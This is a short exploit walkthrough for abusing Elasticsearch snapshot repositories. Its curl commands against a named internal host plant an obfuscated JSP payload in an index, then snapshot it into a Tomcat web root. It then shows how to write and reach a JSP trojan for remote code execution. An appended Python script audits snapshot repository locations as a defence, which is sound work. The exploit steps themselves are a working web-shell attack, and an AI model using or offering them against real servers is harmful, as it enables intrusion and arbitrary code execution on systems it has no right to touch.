1. Create the index document
curl -XPOST http://192.168.0.131:9200/yz.jsp/yz.jsp/1 -d'
{"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":"test"}'
2. Next, create a malicious snapshot repository; the value of location is the path to write to
curl -XPUT 'http://192.168.0.131:9200/_snapshot/yz.jsp' -d '{
"type": "fs",
"settings": {
"location": "/usr/local/tomcat/webapps/wwwroot/",
"compress": false
}
}'
3. Verify the repository and create the snapshot:
curl -XPUT "http://192.168.0.131:9200/_snapshot/yz.jsp/yz.jsp" -d '{
"indices": "yz.jsp",
"ignore_unavailable": "true",
"include_global_state": false
}'
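4. The f= parameter in the URL below is the content that gets written to the file, so a JSP trojan can be written this way. Note that this is port 8080.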
http://192.168.0.131:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp?f=wooYun-2015-110216
5. After the trojan is written, access it. Note that this is port 8080.
http://192.168.0.131:8080/wwwroot/test.jsp // the contents can then be executed
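
A defensive check for the repository abuse in steps 2 and 3, added here as an example and not part of the original write-up: it audits the body of `GET /_snapshot/_all` for `fs` repositories whose `location` falls outside approved directories or inside a web-served one. The sample response, `ALLOWED_ROOTS`, `WEB_ROOTS`, `SCRIPT_EXTS` and the function names are assumptions constructed for illustration.

```python
import json
import posixpath

# Constructed sample of a GET /_snapshot/_all response body (not real output).
SAMPLE_REPOS = json.loads("""
{
  "yz.jsp":    {"type": "fs", "settings": {"location": "/usr/local/tomcat/webapps/wwwroot/", "compress": false}},
  "nightly":   {"type": "fs", "settings": {"location": "/mnt/es_backups/nightly"}},
  "escape":    {"type": "fs", "settings": {"location": "/mnt/es_backups/../../usr/local/tomcat/webapps"}},
  "s3_backup": {"type": "s3", "settings": {"bucket": "example-bucket"}}
}
""")

ALLOWED_ROOTS = ["/mnt/es_backups"]         # assumption: directories approved for snapshots
WEB_ROOTS = ["/usr/local/tomcat/webapps"]   # assumption: directories an app server executes from
SCRIPT_EXTS = (".jsp", ".jspx", ".php", ".asp", ".aspx")


def _under(path, root):
    """True if path equals root or lies below it, after lexical normalisation
    (collapses '..' and trailing slashes; symlinks are not resolved)."""
    path, root = posixpath.normpath(path), posixpath.normpath(root)
    return path == root or path.startswith(root.rstrip("/") + "/")


def audit_repositories(repos, allowed_roots=ALLOWED_ROOTS, web_roots=WEB_ROOTS):
    """Return {repository name: [reasons]} for each fs repository that needs review."""
    findings = {}
    for name, repo in repos.items():
        if repo.get("type") != "fs":
            continue  # only shared-filesystem repositories write to a local path
        location = repo.get("settings", {}).get("location", "")
        reasons = []
        if not any(_under(location, r) for r in allowed_roots):
            reasons.append("location outside approved snapshot directories")
        if any(_under(location, r) for r in web_roots):
            reasons.append("location inside a web-served directory")
        if name.lower().endswith(SCRIPT_EXTS):
            reasons.append("repository name ends in a server-side script extension")
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == "__main__":
    for repo_name, why in audit_repositories(SAMPLE_REPOS).items():
        print(f"{repo_name}: {'; '.join(why)}")
```

Setting `path.repo` in `elasticsearch.yml` makes the node itself refuse `fs` locations outside the listed directories; `ALLOWED_ROOTS` should mirror that list.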